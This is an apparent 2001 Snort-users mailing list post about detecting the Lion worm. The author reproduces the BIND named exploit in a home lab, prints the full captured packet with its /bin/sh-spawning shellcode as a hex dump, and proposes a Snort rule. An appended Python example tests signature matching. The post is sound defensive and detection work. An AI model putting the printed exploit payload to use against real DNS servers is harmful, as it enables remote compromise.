1i0n (aka lion worm) RE: [Snort-users] New Worm Virus is in the wild

Andreas Östling andreaso at ...236...
Sat Mar 24 16:08:20 EST 2001


On Fri, 23 Mar 2001, Max Vision wrote:

> I created a signature to detect this attack February 8th, when the exploit
> was released (IDS482/named-exploit-tsig-infoleak) - I did this because LSD
> were the first people to release a *decent* working bind exploit.  So I
> wrote a signature for it... sure enough that is exactly what is used by
> this worm.  People using vision.conf since february 8th should have seen
> alerts for this attack (if the worm dropped by, whether it was successful
> or not).

Hmm.. so far I have seen the Lion worm executing the named exploit two
times in the wild. However, the latest vision.conf did not catch it (but
matching just "/bin/sh" on another Snort machine did).

Here I successfully exploit named on a RH 6.2 on my home network by
running "./bind 192.168.1.1 -v r" (using lib/scan/bind from crew.tgz),
just like Lion does:

03/24-20:32:56.769354 192.168.1.3:1038 -> 192.168.1.1:53
UDP TTL:64 TOS:0x0 ID:8792 IpLen:20 DgmLen:537
Len: 517
AB CD 01 00 00 02 00 00 00 00 00 01 3F 90 90 90  ............?...
EB 3B 31 DB 5F 83 EF 7C 8D 77 10 89 77 04 8D 4F  .;1._..|.w..w..O
20 89 4F 08 B3 10 89 19 31 C9 B1 FF 89 0F 51 31   .O.....1.....Q1
C0 B0 66 B3 07 89 F9 CD 80 59 31 DB 39 D8 75 0A  ..f......Y1.9.u.
66 BB 06 65 66 39 5E 02 74 08 E2 E0 3F E8 C0 FF  f..ef9^.t...?...
FF FF 89 CB 31 C9 B1 03 31 C0 B0 3F 49 CD 80 41  ....1...1..?I..A
E2 F6 EB 14 31 C0 5B 8D 4B 14 89 19 89 43 18 88  ....1.[.K....C..
43 07 31 D2 B0 0B CD 80 E8 E7 FF FF FF 2F 62 69  C.1........../bi
6E 2F 73 68 90 90 90 90 90 90 90 90 01 FA 01 BF  n/sh............
01 81 01 40 01 81 01 40 01 00 01 00 01 FB 01 BF  ...@...@........
01 FA 01 BF 01 00 01 00 01 00 01 00 01 8D 01 40  ...............@
01 FB 01 BF 01 52 01 40 01 00 01 00 01 FB 01 BF  .....R.@........
01 00 01 00 01 00 01 00 01 62 01 08 01 63 01 08  .........b...c..
01 64 01 08 01 FB 01 BF 01 62 01 08 01 FC 01 BF  .d.......b......
01 65 01 08 01 00 01 00 01 00 01 00 01 00 01 00  .e..............
01 00 01 00 01 00 01 00 01 80 01 40 01 00 01 00  ...........@....
01 85 01 08 01 62 01 08 01 FB 01 BF 00 00 01 00  .....b..........
01 01 12 01 88 01 FF 01 01 01 00 01 08 01 12 01  ................
06 01 00 01 14 01 FF 01 D4 01 FF 01 55 01 05 01  ............U...
60 01 0D 01 06 01 00 01 88 01 FF 01 01 01 00 01  `...............
AC 01 05 01 B0 01 00 01 FC 01 FF 01 65 01 00 01  ............e...
A4 01 FF 01 90 01 FF 01 4A 01 08 01 0C 01 00 01  ........J.......
60 01 0D 01 00 01 00 01 64 01 11 01 A4 01 BD 01  `.......d.......
A4 01 FF 01 33 01 08 01 0C 01 00 01 00 01 00 01  ....3...........
00 01 00 01 74 01 FF 01 79 01 08 01 0C 01 00 01  ....t...y.......
A4 01 FF 01 40 01 10 01 00 01 00 01 01 01 00 01  ....@...........
00 01 00 01 00 01 0D 01 00 01 0D 01 00 01 0D 01  ................
80 01 0D 01 80 01 0D 01 80 01 0D 01 80 01 0D 01  ................
80 01 0D 01 02 01 00 01 00 01 00 01 00 01 00 01  ................
CC 01 11 01 B6 01 BD 01 00 01 00 01 A4 01 BD 10  ................
06 00 00 00 2D FA FF BF A0 A9 25 3B 00 FC FF BF  ....-.....%;....
01 A9 01 3B 00 00 01 00 01 00 00 FA FF           ...;.........

As you can see, IDS482 (|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00
01 20 20 20 20 02 61|) does not match this packet.

And another thing.
The Lion worm can be pretty easily detected by watching for a port 53 SYN
scan followed by an iquery followed by a named exploit, but I prefer also
to have a specific rule to catch the actual worm, because that most likely
means that the previous named exploit was successful.
For example, something like:

alert tcp any any -> any 53 (msg: "Attempt to set $PATH on port 53/TCP - possibly a successful Lion worm"; content:"PATH="; depth: 5; flags: AP;)

Maybe something similar could be in arachNIDS?
There are of course several other things you could look for to catch the
worm. I don't think that the hosts "ifconfig -a" or "killall -HUP inetd"
should be looked up in the DNS very often for example :)

Regards,
Andreas Östling
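An added example, not from the post or from Snort itself: it rebuilds bytes from Snort's hex-dump format and applies Snort-style content/offset/depth matching, so the IDS482 content bytes quoted above and the plain "/bin/sh" match can be tried against a packet. The sample dump is constructed: its first line is the DNS header line of the packet above, the second is stand-in filler that only carries the "/bin/sh" string.

```python
import re
import struct

# Constructed sample in Snort's hex-dump format. Line 1 is the DNS header line
# of the packet quoted in the post; line 2 is stand-in filler (not the real
# payload) that only carries the "/bin/sh" string the other Snort box matched.
SAMPLE_DUMP = """\
AB CD 01 00 00 02 00 00 00 00 00 01 3F 90 90 90  ............?...
90 90 90 90 90 90 90 90 2F 62 69 6E 2F 73 68 00  ......../bin/sh.
"""

# Content bytes of IDS482/named-exploit-tsig-infoleak, as quoted in the post.
IDS482_CONTENT = bytes.fromhex(
    "AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61")

def parse_snort_dump(dump: str) -> bytes:
    """Rebuild raw bytes from Snort's 'XX XX ...  ascii' dump lines.
    Hex pairs are single-space separated; two spaces start the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        hex_part = line.split("  ", 1)[0]          # drop the ASCII column
        out.extend(int(p, 16) for p in re.findall(r"\b[0-9A-Fa-f]{2}\b", hex_part))
    return bytes(out)

def content_match(payload: bytes, content: bytes, offset: int = 0, depth=None) -> bool:
    """Snort-style 'content' test with optional 'offset' and 'depth':
    look for `content` within the `depth` bytes starting at `offset`."""
    end = None if depth is None else offset + depth
    return content in payload[offset:end]

def dns_header(payload: bytes) -> dict:
    """Decode the 12-byte DNS header so a rule's fixed bytes can be compared
    field by field with what the packet actually carries."""
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", payload[:12])
    return {"id": ident, "flags": flags, "qdcount": qd,
            "ancount": an, "nscount": ns, "arcount": ar}

def check_rules(payload: bytes) -> dict:
    """Evaluate the two content checks discussed in the thread on one packet."""
    return {"IDS482": content_match(payload, IDS482_CONTENT),
            "/bin/sh": content_match(payload, b"/bin/sh")}

if __name__ == "__main__":
    pkt = parse_snort_dump(SAMPLE_DUMP)
    print(check_rules(pkt))             # {'IDS482': False, '/bin/sh': True}
    print(dns_header(pkt))              # flags 0x0100, qdcount 2, arcount 1
    print(dns_header(IDS482_CONTENT))   # flags 0x0980, ancount 1
```

The header decode shows where the two diverge: the signature's bytes encode flags 0x0980 with ANCOUNT=1, while the captured packet carries flags 0x0100 with QDCOUNT=2 and ARCOUNT=1, so a content match anchored on those header bytes cannot fire.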